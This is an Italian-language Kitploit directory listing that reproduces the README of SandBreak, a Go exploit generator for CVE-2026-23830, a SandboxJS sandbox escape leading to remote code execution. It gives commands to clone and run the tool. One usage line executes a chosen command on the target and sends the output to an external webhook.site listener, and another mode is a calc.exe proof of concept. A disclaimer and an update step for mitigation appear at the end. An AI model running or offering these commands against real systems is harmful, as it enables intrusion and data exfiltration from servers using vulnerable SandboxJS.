Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-23830-SandBreak — Genera e fornisce payload di exploit per CVE-2026-23830, una sandbox escape di SandboxJS, con modalità per l'esfiltrazione OOB cieca e il PoC locale di calc. Supporta listener HTTP/HTTPS e produce payload JavaScript minificati. | Kitploit
Strumenti/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

Genera e fornisce payload di exploit per CVE-2026-23830, una sandbox escape di SandboxJS, con modalità per l'esfiltrazione OOB cieca e il PoC locale di calc. Supporta listener HTTP/HTTPS e produce payload JavaScript minificati.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
16 mesi faNon ancora revisionato
Condividi

SandBreak

Generatore di Exploit CVE-2026-23830 e Strumento Auto-Pwn

Go Version License Type

SandBreak è un robusto generatore di exploit basato su Go, progettato per sfruttare la vulnerabilità di Escape di SandboxJS (CVE-2026-23830).

Questo strumento sfrutta il costruttore AsyncFunction non protetto nelle versioni precedenti di sandboxjs, consentendo agli attaccanti di evadere dall'ambiente sandbox V8 ed eseguire codice arbitrario sul sistema host. Supporta molteplici modalità di payload, tra cui Exfiltrazione OOB Cieca, Defacement e RCE Basata su Errori.


Caratteristiche

  • 2 Modalità di Attacco:
    • oob: Exfiltrazione di Dati Out-of-Band (HTTP/HTTPS) per scenari ciechi.
  • calc: Apre calc.exe (PoC Classico).
  • OOB Intelligente: Rileva automaticamente HTTP vs HTTPS per prevenire crash del server.
  • Basato su Go: Singolo binario, nessuna dipendenza richiesta sulla macchina dell'attaccante.
  • Leggero: Genera payload JavaScript puri e minificati.

  • Installazione

    Clona il repository ed esegui:

    root@kitploit:~
    git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
    cd CVE-2026-23830-SandBreak
    go run CVE-2026-23830.go
    

    Utilizzo

    root@kitploit:~
    go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
    

    1. Modalità OOB (RCE Cieca - Professionale)

    Usala quando non hai feedback di output. Esegue il comando e invia il risultato codificato in Base64 al tuo listener (es. webhook.site).

    root@kitploit:~
    go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
    

    Bypassa con successo i crash di base del filtraggio egress gestendo gli errori di rete.

    2. Modalità Calc (Test Locale)

    Apre una calcolatrice sul server Windows.

    root@kitploit:~
    go run CVE-2026-23830.go -mode calc
    

    Prova di Concetto (PoC)

    Scenario: Exfiltrazione OOB

    L'attaccante riceve i dati utente del server tramite Webhook nonostante nessun output visivo sul sito.


    Disclaimer

    Questo strumento è creato esclusivamente per Scopi Educativi e Test di Penetrazione Autorizzati.

    • Non utilizzare questo strumento su sistemi che non possiedi o per cui non hai esplicita autorizzazione al test.
    • L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.

    Mitigazione

    Aggiorna sandboxjs all'ultima versione in cui il costruttore AsyncFunction è correttamente isolato nella sandbox.

    root@kitploit:~
    npm update sandboxjs
    

    Autore: Meysam Bal-afkan

    Licenza: MIT

    Scarica lo strumento